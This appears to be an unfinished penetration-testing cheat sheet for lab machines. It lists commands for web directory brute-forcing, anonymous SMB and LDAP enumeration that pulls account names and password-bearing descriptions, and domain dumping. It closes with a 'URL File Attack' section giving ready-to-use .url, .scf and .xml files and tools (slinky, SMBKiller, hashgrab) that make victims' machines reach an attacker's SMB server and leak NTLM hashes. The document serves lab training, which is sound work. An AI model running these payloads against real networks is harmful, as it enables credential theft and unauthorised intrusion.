Still in Progress
Web Enumeration
export URL="http://192.168.231.55/"
Directory Enumeration
gobuster dir -u $URL -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -k -t 30
File Enumeration
gobuster dir -u $URL -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt -k -t 30
SMB Enumeration
Null (anonymous, no-credential) sessions on SMB
crackmapexec smb 10.10.10.1 -u '' -p ''
smbclient -L //10.10.10.1 --no-pass
smbclient -N -L \\\\10.10.10.1\\
smbclient //10.10.10.1/folder --no-pass
smbmap -H 10.10.10.1 -u null -p ""
With Credentials
smbclient //10.10.10.1/'File Share' -U fileshare%'password1'
LDAP Enumeration
nmap --script "ldap* and not brute" 192.168.216.165 -p 389 -v -Pn -sT
nmap -n -sV --script "ldap* and not brute" <IP>
ldapsearch -x -H ldap://192.168.216.165 -b "dc=heist,DC=offsec"
Find the machine's domain name; the base DN passed to -b is the domain name split into DC= components (e.g. hutch.offsec → DC=hutch,DC=offsec).
ldapsearch -v -x -b "DC=hutch,DC=offsec" -H "ldap://192.168.197.122" "(objectclass=*)"
Account names only.
ldapsearch -v -x -b "DC=victim,DC=local" -H "ldap://192.168.216.165" "(objectclass=*)" | grep sAMAccountName
ldapsearch -x -H "ldap://192.168.197.122" -b "dc=victime,dc=local" "objectclass=user" sAMAccountName | grep sAMAccountName | awk -F ": " '{print $2}'
Account names and descriptions (the description attribute may contain passwords).
ldapsearch -v -x -b "DC=victim,DC=local" -H "ldap://192.168.216.165" "(objectclass=*)" | grep -e sAMAccountName -e description
ldapsearch -x -H "ldap://192.168.197.122" -b "dc=victim,dc=local" "objectclass=user" sAMAccountName description | grep -e sAMAccountName -e description | awk -F ": " '{print $2}'
ldapdomaindump
With Credentials
ldapdomaindump -u security.local\\<User> -p '<Password>' ldap://<IP>
Without Credentials
ldapdomaindump ldap://192.168.216.165
URL File Attack
cme smb 10.10.10.225 -d victim.loca -u user -p 'password!' -M slinky -o NAME=test SERVER=10.8.0.2
https://github.com/overgrowncarrot1/SMBKiller/blob/main/SMBKiller.py
python3 SMB_Killer.py -l 192.168.45.224 -i tun0 -r 192.168.204.30 -a 'DocumentsShare' -A
@evil.url
[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\192.168.45.214\%USERNAME%.icon
IconIndex=1
@evil.scf
[Shell]
Command=2
IconFile=\\192.168.45.214\tools\nc.ico
[Taskbar]
Command=ToggleDesktop
@evil.xml
("<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
"
"<?mso-application progid='Word.Document'?>
"
"<?xml-stylesheet type='text/xsl' href='\\192.168.45.214\evil.xsl' ?>")
Alternative tool
https://github.com/Greenwolf/ntlm_theft
For .lnk files
https://github.com/xct/hashgrab
python3 ~/tools/hashgrab/hashgrab.py 10.9.1.18 xct
impacket-smbserver share share -smb2support
put @xct.lnk